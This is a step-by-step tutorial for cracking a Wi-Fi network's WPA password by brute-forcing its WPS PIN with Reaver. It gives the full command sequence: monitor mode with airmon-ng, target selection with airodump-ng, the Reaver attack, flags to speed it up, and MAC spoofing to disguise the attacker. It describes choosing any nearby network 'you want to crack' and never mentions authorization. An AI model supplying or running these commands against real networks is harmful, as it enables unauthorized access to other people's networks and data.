Crack a Wi-Fi WPA Password
Step 1: Install Airmon-ng Suite
Step 2: Install Reaver
Step 3: To get root privileges, in terminal type:
# sudo -s
Step 4: Find your wireless card.Inside terminal type:
Step 5: Put your wireless card into monitor mode.Assuming your wireless card's interface name is wlan0, execute the following command to put your wireless card into monitor mode:
# airmon-ng start wlan0
Step 6: In terminal type:
# airodump-ng mon0
It will display a list of wireless networks in range. When you see the network you want to crack, press Ctrl+C to stop the list from refreshing, then copy that network's BSSID (MAC address of the targeted network). The network should have WPA or WPA2 listed under the ENC column.
Step 7: Now we start cracking password with Reaver.
# reaver -i moninterface -b bssid -vv
For example, if your monitor interface was mon0 like mine, and your BSSID was
7F:AC:6B:MB:1F:B2(a BSSID I just made up), your command would look like:
# reaver -i mon0 -b 7F:AC:6B:MB:1F:B2 -vv
Now sit back and relax as Reaver will now try a series of PINs on the router in a brute force attack. The Reaver documentation says it can take between 4 and 10 hours.
Speeding Up the AttackBy default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computational load on the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
MAC SpoofingIn some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:
# ifconfig wlan0 down # ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69 # ifconfig wlan0 up # airmon-ng start wlan0 # reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69